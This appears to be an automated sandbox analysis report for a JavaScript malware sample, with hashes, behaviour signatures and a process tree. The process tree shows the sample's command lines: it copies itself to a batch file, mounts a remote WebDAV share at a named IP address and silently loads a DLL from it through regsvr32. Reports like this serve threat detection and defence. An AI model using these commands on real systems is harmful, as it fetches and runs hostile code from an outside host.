Analysis
max time kernel: 121s
max time network: 126s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 08/07/2024, 18:56
Static task: static1
Behavioral task: behavioral1
  Sample: 288623129288629811.js
  Resource: win7-20240704-en
Behavioral task: behavioral2
  Sample: 288623129288629811.js
  Resource: win10v2004-20240704-en
General
Target: 288623129288629811.js
Size: 5KB
MD5: 27ec8012c9813c8ff50ebe971de23bfb
SHA1: 8df64433d6f743c2524c7b210a71b2b29b943a81
SHA256: 327aad49e2f6cb2b5014d750487a0f3fe5e7102aec23c50407add2ab13b9338e
SHA512: 07abfb3fac91b07d9642b32615b2d47a5d2cf6d4f6ccf56da6e985e8e3a2f9635d3ffbbe13aff5c74b0f39da2721f1fde84e26bab839a0e7dcb7d34146367423
SSDEEP: 96:iQlr8O3jvfPlMOOOOrTTPOOOD9VvK6IiojFVYjMYValVgkxVX:vIO7fdMOOO8zOOO51KtjFVYjMYAl6kxR
Malware Config
Signatures
- Command and Scripting Interpreter: JavaScript (1 TTPs)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Runs net.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  pid   Process
  1536  regsvr32.exe
- Suspicious use of WriteProcessMemory (11 IoCs)
  description                         pid   Process      procid_target
  PID 2316 wrote to memory of 740     2316  wscript.exe  30
  PID 2316 wrote to memory of 740     2316  wscript.exe  30
  PID 2316 wrote to memory of 740     2316  wscript.exe  30
  PID 740 wrote to memory of 2568     740   cmd.exe      32
  PID 740 wrote to memory of 2568     740   cmd.exe      32
  PID 740 wrote to memory of 2568     740   cmd.exe      32
  PID 740 wrote to memory of 1536     740   cmd.exe      33
  PID 740 wrote to memory of 1536     740   cmd.exe      33
  PID 740 wrote to memory of 1536     740   cmd.exe      33
  PID 740 wrote to memory of 1536     740   cmd.exe      33
  PID 740 wrote to memory of 1536     740   cmd.exe      33
Processes
- C:\Windows\system32\wscript.exe
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\288623129288629811.js
  - Suspicious use of WriteProcessMemory
  PID:2316
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\288623129288629811.js" "C:\Users\Admin\\hmidau.bat" && "C:\Users\Admin\\hmidau.bat"
    - Suspicious use of WriteProcessMemory
    PID:740
    - C:\Windows\system32\net.exe
      Command line: net use \\45.9.74.13@8888\DavWWWRoot\
      PID:2568
    - C:\Windows\system32\regsvr32.exe
      Command line: regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\419.dll
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:1536
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 5KB
  MD5: 27ec8012c9813c8ff50ebe971de23bfb
  SHA1: 8df64433d6f743c2524c7b210a71b2b29b943a81
  SHA256: 327aad49e2f6cb2b5014d750487a0f3fe5e7102aec23c50407add2ab13b9338e
  SHA512: 07abfb3fac91b07d9642b32615b2d47a5d2cf6d4f6ccf56da6e985e8e3a2f9635d3ffbbe13aff5c74b0f39da2721f1fde84e26bab839a0e7dcb7d34146367423